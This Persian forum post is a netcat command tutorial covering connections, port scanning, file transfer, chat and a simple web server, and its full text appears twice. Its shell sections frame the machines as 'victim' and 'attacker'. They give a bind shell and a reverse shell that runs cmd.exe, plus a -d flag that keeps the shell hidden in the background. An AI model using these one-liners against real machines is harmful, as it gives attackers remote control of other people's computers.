ravegoat
14-03-08, 09:19
نت کت (به اختصار NC) برنامه ای است که از آن برای ارتباطات تحت شبکه و اینترنتی، استفاده می کنند. این برنامه کنسولی یعنی فاقد رابط گرافیکی می باشد. در زیر فرمان های پر کاربرد این برنامه بیان می شود.
*برقراری ارتباط از طریق درگاه TCP:
الگو:
nc [Remote Machine IP] [Port Number]
آدرس آی-پی رایانه ای که می خواهیم به آن وصل شویم. Remote Machine IP
شماره درگاه(پورت) TCP باز روی رایانه ای که می خواهیم به آن وصل شویم. Port Number
مثال:
nc 86.0.0.1 80
*برقراری ارتباط از طریق درگاه UDP:
الگو:
nc [Remote Machine IP] -u [Port Number]
مثال:
nc 86.0.0.1 -u 1111
*حالت شنود روی درگاه TCP: در حالت شنود یک درگاه روی رایانه ی شما باز می گردد و سایر رایانه ها می توانند از طریق آن درگاه با شما ارتباط برقرار کنند.
الگو:
nc -l -p [Port Number]
پورتی که از طریق آن شنود می کنیم. Port Number
مثال:
nc -l -p 1234
*حالت شنود روی درگاه UDP:
الگو:
nc -l -u -p [Port Number]
مثال:
nc -l -u -p 1234
*پویش درگاه های(پورت) TCP روی یک رایانه (بهتر است برای پویش درگاه از نرم افزار هایی مانند Nmap استفاده کنید.):
الگو:
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP]
[First Port]-[Last Port]
یک عبارت رشته ای دلخواه که به هر پورت به هنگام پویش، فرستاده می شود. String to Send
مقدار زمانی بر حسب ثانیه برای اسکن هر پورت Time to Wait
اولین شماره ی پورت برای پویش First Port
آخرین شماره ی پورت برای پویش Last Port
مثال:
echo QUIT | nc -v -w 3 86.0.0.1 1-10000
*پویش درگاه های(پورت) UDP روی یک رایانه:
الگو:
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP] -u
[First Port]-[Last Port]
مثال:
echo QUIT | nc -v -w 3 86.0.0.1 -u 1-10000
*ارسال و دریافت فایل (نوع اول):
الگوی ارسال:
nc -l -p [Port Number] -s [Destination Machine IP] < [File Path]
آدرس آی-پی رایانه ای که می خواهیم فایل را برای آن ارسال کنیم. Destination Machine IP
مسیر پرونده ای (فایل) که می خواهیم آن را ارسال کنیم. File Path
مثال:
nc -l -p 1234 -s 86.0.0.1 < C:\Picture\1.jpg
الگوی دریافت:
nc [File Sending Machine IP] [Port Number] > [File Destination]
آدرس آی-پی رایانه ای که فایل را ارسال می کند. File Sending Machine IP
مسیر ذخیره سازی فایل ارسالی File Destination
مثال:
nc 87.0.0.1 1234 > E:\Peace (1).jpg
*ارسال و دریافت فایل (نوع دوم):
الگوی ارسال:
nc [Destination Machine IP] [Port Number] < [File Path]
مثال:
nc 86.0.0.1 1111 < C:\Picture\1.jpg
الگوی دریافت:
nc -l -p [Port Number] -s [File Sending Machine IP] > [File Destination]
مثال:
nc -l -p 1111 -s 87.0.0.1 > E:\Peace (1).jpg
*گپ زدن (چت کردن): پس از برقراری ارتباط بین دو رایانه، آن ها می توانند به یکدیگر عبارت های رشته ای ارسال کنند.
الگو برای رایانه ی 1:
nc -l -p [Port Number] -s [Computer 2 IP]
آدرس آی-پی رایانه ی 2 Computer 2 IP
مثال:
nc -l -p 1111 -s 86.0.0.1
الگو برای رایانه ی 2:
nc [Computer 1] [Port Number]
آدرس آی-پی رایانه ی 1 Computer 1 IP
مثال:
nc 87.0.0.1 1111
اکنون ارتباط برقرار شده و رشته ها می توانند ارسال شوند.
*شل گرفتن از رایانه (نوع اول): از طریق نت کت می توان به Command Prompt رایانه ای دسترسی داشت که به این عمل شل گرفتن می گویند.
اگر فرمان زیر روی رایانه ای(مانند رایانه ی الف که سیستم عامل ویندوز روی آن نصب شده است) اجرا شود، رایانه های دیگر با داشتن پورت باز(که در زیر تعریف می شود) و آدرس آی-پی رایانه ی الف می توانند این رایانه را با خط فرمان کنترل کنند. در این نوع شل ابتدا باید الگوی فرمان رایانه ی قربانی اجرا شود. سپس مهاجم در هر زمانی که قربانی آنلاین بود می تواند او را کنترل کند.
الگوی رایانه ی قربانی:
nc -l -p [Port Number] -e [Console Application Path]
مسیر برنامه ی خط فرمان سیستم عامل که برای ویندوز، cmd.exe و برای لینوکس bin/sh/ می باشد. Console Application Path
مثال:
nc -l -p 1234 -e cmd.exe
الگوی رایانه ی نفوذ گر:
nc [Victim Computer IP] [Port Number(Listen Mode)]
آدرس آی-پی رایانه ی قربانی Victim Computer IP
شماره پورتی که در بالا تعریف شد Port Number
مثال:
nc 86.0.0.1 1234
*شل گرفتن از رایانه (نوع دوم):
در این نوع شل، ابتدا باید الگوی فرمان مهاجم اجرا شود. زمانی که الگوی فرمان قربانی اجرا شود، در صورت آنلاین بودن مهاجم، رایانه تحت کنترل مهاجم قرار می گیرد.
الگوی رایانه ی نفوذ گر:
nc -l -p [Port Number]
مثال:
nc -l -p 1234
الگوی رایانه ی قربانی:
nc [Attacker Computer IP] [Port Number] -e [Console Application Path]
آدرس آی-پی رایانه ی مهاجم Attacker Computer IP
مثال:
nc 87.0.0.1 1234 -e cmd.exe
*ایجاد وب سرور: وب سرور برنامه ای است که به شما این امکان را می دهد که صفحات وب را توسط رایانه ی خود(رایانه ای که در آن وب سرور نصب شده است) در اینترنت نمایش دهید. در این صورت کابران با وارد کردن آی-پی شما در مرورگرشان قادر به دیدن صفحات وب موجود در رایانه تان می شوند. مهمترین وب سرور ها Microsoft IIS و Apache می باشند.
الگوی ایجاد وب سرور:
ابتدا یک فایل اجرایی بچ (فایلی با پسوند .BAT) ایجاد می کنیم. نامی برایش در نظر می گیریم. مانند: WebServer.bat .سپس خطوط زیر را در آن فایل تایپ می کنیم:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [HomePage File Path]
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
[...]
Batch FileName.bat
مقدار زمان لازم برای بارگذاری فایل؛ به تناسب اندازه و بر حسب ثانیه Time to wait for Client
مسیر صفحه ی آغازین در رایانه شما که می تواند یک صفحه ی HTML، ASP، VRML یا ... باشد. HomePage File Path
مسیر سایر صفحات وب و پرونده های مورد نیاز در رایانه ی شما؛ مانند عکس پشت صفحه، موسیقی زمینه، عکس های صفحات یا ... . Other files path
شما می توانید به مقدار دلخواه فایل اضافه کنید [...] که برای اضافه کردن هر فایا از الگوی زیر استفاده می کنیم:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
نام فایل بچ که طبق مثال نام آن WebServer.bat بود. پس از اضافه کردن فایل ها نام فایل بچ را به عنوان آخرین خط تایپ می کنیم. Batch FileName.bat
مثال:
nc -l -p 80 -w 1 < HomePage.htm
nc -l -p 80 -w 1 < BackgroundPicture.jpg
nc -l -p 80 -w 1 < BackgroundMusic.mp3
WebServer.bat
# برای فعال کردن وب سرور فایل بچ را اجرا می کنیم.
## برای غیر فعال کردن وب سرور در پنجره ی مریوط به فایل بچ، از کلید های ترکیبی Ctrl+C استفاده می کنیم. پس از فشردن کلید ها، سوالی پرسیده می شود که در جواب آن y (اولین حرف واژه ی yes به معنی بله) را تایپ می کنیم و Enter را می فشاریم.
### اکنون با تایپ آی-پی در مرورگری به غیر از Opera، قادر به دیدن صفحه ی آغازین خواهیم بود.
** نکات مهم **
1: در مجموع 65535 پورت TCP و 65535 پورت UDP وجود دارند. پس شماره ی پورت باید بین 1 تا 65535 باشد.
2: اگر از پارامتر -d در آخر هر فرمان استفده شود، با بستن پنجره ی خط فرمان مربوط به نت کت، NC در پشت پرده به فعالیت های خود ادامه می دهد:
nc -l -p 1234 -e cmd.exe -d
3: با استفده از پارامتر های -v و -vv می توان از جزئیات مطلع گشت:
nc 86.0.0.1 80 -v
nc 86.0.0.1 80 -vv
4: برای قطع اتصال از کلید ترکیبی Ctrl+C استفاده می کنیم(در پنجره ی خط فرمان که به وسیله آن NC اجرا شده است).
*برقراری ارتباط از طریق درگاه TCP:
الگو:
nc [Remote Machine IP] [Port Number]
آدرس آی-پی رایانه ای که می خواهیم به آن وصل شویم. Remote Machine IP
شماره درگاه(پورت) TCP باز روی رایانه ای که می خواهیم به آن وصل شویم. Port Number
مثال:
nc 86.0.0.1 80
*برقراری ارتباط از طریق درگاه UDP:
الگو:
nc [Remote Machine IP] -u [Port Number]
مثال:
nc 86.0.0.1 -u 1111
*حالت شنود روی درگاه TCP: در حالت شنود یک درگاه روی رایانه ی شما باز می گردد و سایر رایانه ها می توانند از طریق آن درگاه با شما ارتباط برقرار کنند.
الگو:
nc -l -p [Port Number]
پورتی که از طریق آن شنود می کنیم. Port Number
مثال:
nc -l -p 1234
*حالت شنود روی درگاه UDP:
الگو:
nc -l -u -p [Port Number]
مثال:
nc -l -u -p 1234
*پویش درگاه های(پورت) TCP روی یک رایانه (بهتر است برای پویش درگاه از نرم افزار هایی مانند Nmap استفاده کنید.):
الگو:
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP]
[First Port]-[Last Port]
یک عبارت رشته ای دلخواه که به هر پورت به هنگام پویش، فرستاده می شود. String to Send
مقدار زمانی بر حسب ثانیه برای اسکن هر پورت Time to Wait
اولین شماره ی پورت برای پویش First Port
آخرین شماره ی پورت برای پویش Last Port
مثال:
echo QUIT | nc -v -w 3 86.0.0.1 1-10000
*پویش درگاه های(پورت) UDP روی یک رایانه:
الگو:
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP] -u
[First Port]-[Last Port]
مثال:
echo QUIT | nc -v -w 3 86.0.0.1 -u 1-10000
*ارسال و دریافت فایل (نوع اول):
الگوی ارسال:
nc -l -p [Port Number] -s [Destination Machine IP] < [File Path]
آدرس آی-پی رایانه ای که می خواهیم فایل را برای آن ارسال کنیم. Destination Machine IP
مسیر پرونده ای (فایل) که می خواهیم آن را ارسال کنیم. File Path
مثال:
nc -l -p 1234 -s 86.0.0.1 < C:\Picture\1.jpg
الگوی دریافت:
nc [File Sending Machine IP] [Port Number] > [File Destination]
آدرس آی-پی رایانه ای که فایل را ارسال می کند. File Sending Machine IP
مسیر ذخیره سازی فایل ارسالی File Destination
مثال:
nc 87.0.0.1 1234 > E:\Peace (1).jpg
*ارسال و دریافت فایل (نوع دوم):
الگوی ارسال:
nc [Destination Machine IP] [Port Number] < [File Path]
مثال:
nc 86.0.0.1 1111 < C:\Picture\1.jpg
الگوی دریافت:
nc -l -p [Port Number] -s [File Sending Machine IP] > [File Destination]
مثال:
nc -l -p 1111 -s 87.0.0.1 > E:\Peace (1).jpg
*گپ زدن (چت کردن): پس از برقراری ارتباط بین دو رایانه، آن ها می توانند به یکدیگر عبارت های رشته ای ارسال کنند.
الگو برای رایانه ی 1:
nc -l -p [Port Number] -s [Computer 2 IP]
آدرس آی-پی رایانه ی 2 Computer 2 IP
مثال:
nc -l -p 1111 -s 86.0.0.1
الگو برای رایانه ی 2:
nc [Computer 1] [Port Number]
آدرس آی-پی رایانه ی 1 Computer 1 IP
مثال:
nc 87.0.0.1 1111
اکنون ارتباط برقرار شده و رشته ها می توانند ارسال شوند.
*شل گرفتن از رایانه (نوع اول): از طریق نت کت می توان به Command Prompt رایانه ای دسترسی داشت که به این عمل شل گرفتن می گویند.
اگر فرمان زیر روی رایانه ای(مانند رایانه ی الف که سیستم عامل ویندوز روی آن نصب شده است) اجرا شود، رایانه های دیگر با داشتن پورت باز(که در زیر تعریف می شود) و آدرس آی-پی رایانه ی الف می توانند این رایانه را با خط فرمان کنترل کنند. در این نوع شل ابتدا باید الگوی فرمان رایانه ی قربانی اجرا شود. سپس مهاجم در هر زمانی که قربانی آنلاین بود می تواند او را کنترل کند.
الگوی رایانه ی قربانی:
nc -l -p [Port Number] -e [Console Application Path]
مسیر برنامه ی خط فرمان سیستم عامل که برای ویندوز، cmd.exe و برای لینوکس bin/sh/ می باشد. Console Application Path
مثال:
nc -l -p 1234 -e cmd.exe
الگوی رایانه ی نفوذ گر:
nc [Victim Computer IP] [Port Number(Listen Mode)]
آدرس آی-پی رایانه ی قربانی Victim Computer IP
شماره پورتی که در بالا تعریف شد Port Number
مثال:
nc 86.0.0.1 1234
*شل گرفتن از رایانه (نوع دوم):
در این نوع شل، ابتدا باید الگوی فرمان مهاجم اجرا شود. زمانی که الگوی فرمان قربانی اجرا شود، در صورت آنلاین بودن مهاجم، رایانه تحت کنترل مهاجم قرار می گیرد.
الگوی رایانه ی نفوذ گر:
nc -l -p [Port Number]
مثال:
nc -l -p 1234
الگوی رایانه ی قربانی:
nc [Attacker Computer IP] [Port Number] -e [Console Application Path]
آدرس آی-پی رایانه ی مهاجم Attacker Computer IP
مثال:
nc 87.0.0.1 1234 -e cmd.exe
*ایجاد وب سرور: وب سرور برنامه ای است که به شما این امکان را می دهد که صفحات وب را توسط رایانه ی خود(رایانه ای که در آن وب سرور نصب شده است) در اینترنت نمایش دهید. در این صورت کابران با وارد کردن آی-پی شما در مرورگرشان قادر به دیدن صفحات وب موجود در رایانه تان می شوند. مهمترین وب سرور ها Microsoft IIS و Apache می باشند.
الگوی ایجاد وب سرور:
ابتدا یک فایل اجرایی بچ (فایلی با پسوند .BAT) ایجاد می کنیم. نامی برایش در نظر می گیریم. مانند: WebServer.bat .سپس خطوط زیر را در آن فایل تایپ می کنیم:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [HomePage File Path]
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
[...]
Batch FileName.bat
مقدار زمان لازم برای بارگذاری فایل؛ به تناسب اندازه و بر حسب ثانیه Time to wait for Client
مسیر صفحه ی آغازین در رایانه شما که می تواند یک صفحه ی HTML، ASP، VRML یا ... باشد. HomePage File Path
مسیر سایر صفحات وب و پرونده های مورد نیاز در رایانه ی شما؛ مانند عکس پشت صفحه، موسیقی زمینه، عکس های صفحات یا ... . Other files path
شما می توانید به مقدار دلخواه فایل اضافه کنید [...] که برای اضافه کردن هر فایا از الگوی زیر استفاده می کنیم:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
نام فایل بچ که طبق مثال نام آن WebServer.bat بود. پس از اضافه کردن فایل ها نام فایل بچ را به عنوان آخرین خط تایپ می کنیم. Batch FileName.bat
مثال:
nc -l -p 80 -w 1 < HomePage.htm
nc -l -p 80 -w 1 < BackgroundPicture.jpg
nc -l -p 80 -w 1 < BackgroundMusic.mp3
WebServer.bat
# برای فعال کردن وب سرور فایل بچ را اجرا می کنیم.
## برای غیر فعال کردن وب سرور در پنجره ی مریوط به فایل بچ، از کلید های ترکیبی Ctrl+C استفاده می کنیم. پس از فشردن کلید ها، سوالی پرسیده می شود که در جواب آن y (اولین حرف واژه ی yes به معنی بله) را تایپ می کنیم و Enter را می فشاریم.
### اکنون با تایپ آی-پی در مرورگری به غیر از Opera، قادر به دیدن صفحه ی آغازین خواهیم بود.
** نکات مهم **
1: در مجموع 65535 پورت TCP و 65535 پورت UDP وجود دارند. پس شماره ی پورت باید بین 1 تا 65535 باشد.
2: اگر از پارامتر -d در آخر هر فرمان استفده شود، با بستن پنجره ی خط فرمان مربوط به نت کت، NC در پشت پرده به فعالیت های خود ادامه می دهد:
nc -l -p 1234 -e cmd.exe -d
3: با استفده از پارامتر های -v و -vv می توان از جزئیات مطلع گشت:
nc 86.0.0.1 80 -v
nc 86.0.0.1 80 -vv
4: برای قطع اتصال از کلید ترکیبی Ctrl+C استفاده می کنیم(در پنجره ی خط فرمان که به وسیله آن NC اجرا شده است).